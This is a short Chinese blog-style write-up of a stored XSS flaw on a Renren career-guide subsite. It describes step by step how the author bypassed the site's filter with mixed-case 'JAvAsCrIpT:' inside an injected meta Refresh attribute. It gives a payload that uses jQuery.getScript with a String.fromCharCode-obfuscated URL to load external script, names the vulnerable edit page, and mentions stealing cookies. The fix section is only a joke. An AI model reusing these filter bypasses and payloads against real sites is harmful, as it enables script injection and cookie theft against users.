好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

人人网某分站存储型XSS - 网站安全 - 自学php

过滤不严导致XSS...

 

本来是去找工作的,谁知道顺便挖出来个XSS..-_-

开始先测试各种标签..发现过滤器基于白名单,input,img木有过滤...

然后发现<input type="submit" />会侧漏.. 过滤器弱爆了...  

 

在这个地方测试了一些时间,发先不好利用,然后突然发现个好玩的东东..

 

 

 

 

测试中发现不能闭合,不过滤<和",但是过滤>

 

 

 

接着从Refresh入手...

观察观察

 

 

 

自己的content被和谐了...

 

 

想办法用他的content,分开写就OK了..

 

 

 

猥琐的过滤器,冒号被换成中文的了...

经过测试,在别的地方,冒号不会被替换...

目测是javascript的问题..

 

改为JAvAsCrIpT:

 

 

成功跨...过滤器弱爆了...

 

 

 

继续调用外部js,有字数限制..

 

 

 

目测支持JQuery..试试

 

//http://127.0.0.1/1.js

0;url=JAvAsCrIpT:jQuery.getScript(String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,49,46,106,115))" http-equiv="Refresh"

 

 

 

 

OK了... 顺便用JQ清空代码...

 

 

 

哦对了,cookie:

 

 

Over

 

http://xiaozhao.renren.com/careerguide/edit

 

发帖然后改包..改成如下即可

0;url=JAvAsCrIpT:alert(Drizzle.Risk)" http-equiv="Refresh"

 

 

修复方案:

@人人网,你懂的..

查看更多关于人人网某分站存储型XSS - 网站安全 - 自学php的详细内容...

  阅读:47次